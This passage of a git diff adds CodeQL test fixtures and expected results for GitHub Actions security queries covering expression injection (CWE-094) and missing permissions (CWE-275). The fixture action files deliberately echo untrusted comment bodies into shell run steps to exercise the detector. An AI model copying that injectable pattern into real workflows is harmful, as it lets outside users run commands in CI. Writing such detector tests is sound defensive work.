git ... itle }} | semmle.label | ${{ git ... itle }} | +| .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | +| .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | +| .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | +| .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | +| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | semmle.label | matrix: ... iles }} [matrix] | +| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | semmle.label | ${{ fro ... rix) }} | +| .github/workflows/matrix.yml:41:12:42:31 | \| | semmle.label | \| | +| .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | +| .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | +| .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | +| .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | +| .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | +| .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | +| .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | +| .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | +| .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | +| .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | +| .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | +| .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | +| .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | +| .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | semmle.label | id: summary [value] | +| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | +| .github/workflows/simple1.yml:15:14:16:50 | \| | semmle.label | \| | +| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/simple2.yml:28:14:31:15 | \| | semmle.label | \| | +| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | semmle.label | job_out ... test }} [job_output] | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | semmle.label | ${{ ste ... test }} | +| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | semmle.label | id: step0 [value] | +| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | +| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | semmle.label | id: step1 [MSG] | +| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | semmle.label | ${{ ste ... value}} | +| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | semmle.label | id: step2 [test] | +| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | semmle.label | ${{step ... s.MSG}} | +| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | +| .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | +| action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +subpaths +#select +| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/changed-files.yml:21:14:24:15 | \| | .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/cross3.yml:41:12:43:5 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:41:12:43:5 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/matrix.yml:41:12:42:31 | \| | .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:41:12:42:31 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | +| action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.qlref b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.qlref new file mode 100644 index 00000000000..edaea6fbb21 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.qlref @@ -0,0 +1 @@ +Security/CWE-094/ExpressionInjection.ql diff --git a/ql/test/query-tests/Security/CWE-094/action1/action.yml b/ql/test/query-tests/Security/CWE-094/action1/action.yml new file mode 100644 index 00000000000..8bfa15b405c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/action1/action.yml @@ -0,0 +1,14 @@ +name: 'test' +description: 'test' +branding: + icon: 'test' + color: 'test' +inputs: + test: + description: test + required: false + default: 'test' +runs: + using: "composite" + steps: + - run: echo '${{ github.event.comment.body }}' diff --git a/ql/test/query-tests/Security/CWE-094/action2/action.yml b/ql/test/query-tests/Security/CWE-094/action2/action.yml new file mode 100644 index 00000000000..20f8d227348 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/action2/action.yml @@ -0,0 +1,17 @@ +name: 'Hello World' +description: 'Greet someone and record the time' +inputs: + who-to-greet: # id of input + description: 'Who to greet' + required: true + default: 'World' +outputs: + time: # id of output + description: 'The time we greeted you' +runs: + using: 'docker' + steps: # this is actually invalid, used to test we correctly identify composite actions + - run: echo '${{ github.event.comment.body }}' + image: 'Dockerfile' + args: + - ${{ inputs.who-to-greet }} diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/missing_perms.yml b/ql/test/query-tests/Security/CWE-275/.github/workflows/missing_perms.yml new file mode 100644 index 00000000000..f000ad6a287 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-275/.github/workflows/missing_perms.yml @@ -0,0 +1,10 @@ +on: + pull_request + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/perms.yml b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms.yml new file mode 100644 index 00000000000..b34dfeec641 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms.yml @@ -0,0 +1,13 @@ +on: + pull_request + +permissions: {} + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + + diff --git a/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected 